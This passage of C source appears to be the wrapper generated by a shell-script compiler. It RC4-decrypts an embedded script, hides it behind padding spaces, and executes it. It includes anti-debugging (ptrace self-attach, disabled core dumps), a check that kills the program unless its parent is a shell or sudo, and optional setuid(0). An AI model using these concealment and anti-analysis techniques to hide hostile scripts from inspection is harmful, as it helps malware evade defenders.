	sprintf(procfile, "/proc/%d/cmdline", pid);
	FILE* f = fopen(procfile, "r");
	if (f) {
		size_t size;
		size = fread(name, sizeof (char), sizeof (procfile), f);
		if (size > 0) {
			if ('\n' == name[size - 1])
				name[size - 1] = '\0';
		}
		fclose(f);
	}
}

void hardening() {
    prctl(PR_SET_DUMPABLE, 0);
    prctl(PR_SET_PTRACER, -1);

    int pid = getppid();
    char name[256] = {0};
    gets_process_name(pid, name);

    if (   (strcmp(name, "bash") != 0) 
        && (strcmp(name, "/bin/bash") != 0) 
        && (strcmp(name, "sh") != 0) 
        && (strcmp(name, "/bin/sh") != 0) 
        && (strcmp(name, "sudo") != 0) 
        && (strcmp(name, "/bin/sudo") != 0) 
        && (strcmp(name, "/usr/bin/sudo") != 0)
        && (strcmp(name, "gksudo") != 0) 
        && (strcmp(name, "/bin/gksudo") != 0) 
        && (strcmp(name, "/usr/bin/gksudo") != 0) 
        && (strcmp(name, "kdesu") != 0) 
        && (strcmp(name, "/bin/kdesu") != 0) 
        && (strcmp(name, "/usr/bin/kdesu") != 0) 
       )
    {
        printf("Operation not permitted\n");
        kill(getpid(), SIGKILL);
        exit(1);
    }
}

#endif /* HARDENING */

#if !TRACEABLE

#define _LINUX_SOURCE_COMPAT
#include <sys/ptrace.h>
#include <sys/types.h>
#include <sys/wait.h>
#include <fcntl.h>
#include <signal.h>
#include <stdio.h>
#include <unistd.h>

#if !defined(PT_ATTACHEXC) /* New replacement for PT_ATTACH */
   #if !defined(PTRACE_ATTACH) && defined(PT_ATTACH)
       #define PT_ATTACHEXC	PT_ATTACH
   #elif defined(PTRACE_ATTACH)
       #define PT_ATTACHEXC PTRACE_ATTACH
   #endif
#endif

void untraceable(char * argv0)
{
	char proc[80];
	int pid, mine;

	switch(pid = fork()) {
	case  0:
		pid = getppid();
		/* For problematic SunOS ptrace */
#if defined(__FreeBSD__)
		sprintf(proc, "/proc/%d/mem", (int)pid);
#else
		sprintf(proc, "/proc/%d/as",  (int)pid);
#endif
		close(0);
		mine = !open(proc, O_RDWR|O_EXCL);
		if (!mine && errno != EBUSY)
			mine = !ptrace(PT_ATTACHEXC, pid, 0, 0);
		if (mine) {
			kill(pid, SIGCONT);
		} else {
			perror(argv0);
			kill(pid, SIGKILL);
		}
		_exit(mine);
	case -1:
		break;
	default:
		if (pid == waitpid(pid, 0, 0))
			return;
	}
	perror(argv0);
	_exit(1);
}
#endif /* !TRACEABLE */

char * xsh(int argc, char ** argv)
{
	char * scrpt;
	int ret, i, j;
	char ** varg;
	char * me = argv[0];
	if (me == NULL) { me = getenv("_"); }
	if (me == 0) { fprintf(stderr, "E: neither argv[0] nor $_ works."); exit(1); }

	ret = chkenv(argc);
	stte_0();
	 key(pswd, pswd_z);
	arc4(msg1, msg1_z);
	arc4(date, date_z);
	if (date[0] && (atoll(date)<time(NULL)))
		return msg1;
	arc4(shll, shll_z);
	arc4(inlo, inlo_z);
	arc4(xecc, xecc_z);
	arc4(lsto, lsto_z);
	arc4(tst1, tst1_z);
	 key(tst1, tst1_z);
	arc4(chk1, chk1_z);
	if ((chk1_z != tst1_z) || memcmp(tst1, chk1, tst1_z))
		return tst1;
	arc4(msg2, msg2_z);
	if (ret < 0)
		return msg2;
	varg = (char **)calloc(argc + 10, sizeof(char *));
	if (!varg)
		return 0;
	if (ret) {
		arc4(rlax, rlax_z);
		if (!rlax[0] && key_with_file(shll))
			return shll;
		arc4(opts, opts_z);
#if HARDENING
	    arc4_hardrun(text, text_z);
	    exit(0);
       /* Seccomp Sandboxing - Start */
       seccomp_hardening();
#endif
		arc4(text, text_z);
		arc4(tst2, tst2_z);
		 key(tst2, tst2_z);
		arc4(chk2, chk2_z);
		if ((chk2_z != tst2_z) || memcmp(tst2, chk2, tst2_z))
			return tst2;
		/* Prepend hide_z spaces to script text to hide it. */
		scrpt = malloc(hide_z + text_z);
		if (!scrpt)
			return 0;
		memset(scrpt, (int) ' ', hide_z);
		memcpy(&scrpt[hide_z], text, text_z);
	} else {			/* Reexecute */
		if (*xecc) {
			scrpt = malloc(512);
			if (!scrpt)
				return 0;
			sprintf(scrpt, xecc, me);
		} else {
			scrpt = me;
		}
	}
	j = 0;
#if BUSYBOXON
	varg[j++] = "busybox";
	varg[j++] = "sh";
#else
	varg[j++] = argv[0];		/* My own name at execution */
#endif
	if (ret && *opts)
		varg[j++] = opts;	/* Options on 1st line of code */
	if (*inlo)
		varg[j++] = inlo;	/* Option introducing inline code */
	varg[j++] = scrpt;		/* The script itself */
	if (*lsto)
		varg[j++] = lsto;	/* Option meaning last option */
	i = (ret > 1) ? ret : 0;	/* Args numbering correction */
	while (i < argc)
		varg[j++] = argv[i++];	/* Main run-time arguments */
	varg[j] = 0;			/* NULL terminated array */
#if DEBUGEXEC
	debugexec(shll, j, varg);
#endif
	execvp(shll, varg);
	return shll;
}

int main(int argc, char ** argv)
{
#if SETUID
   setuid(0);
#endif
#if DEBUGEXEC
	debugexec("main", argc, argv);
#endif
#if HARDENING
	hardening();
#endif
#if !TRACEABLE
	untraceable(argv[0]);
#endif
	argv[1] = xsh(argc, argv);
	fprintf(stderr, "%s%s%s: %s\n", argv[0],
		errno ? ": " : "",
		errno ? strerror(errno) : "",
		argv[1] ? argv[1] : "<null>"
	);
	return 1;
}
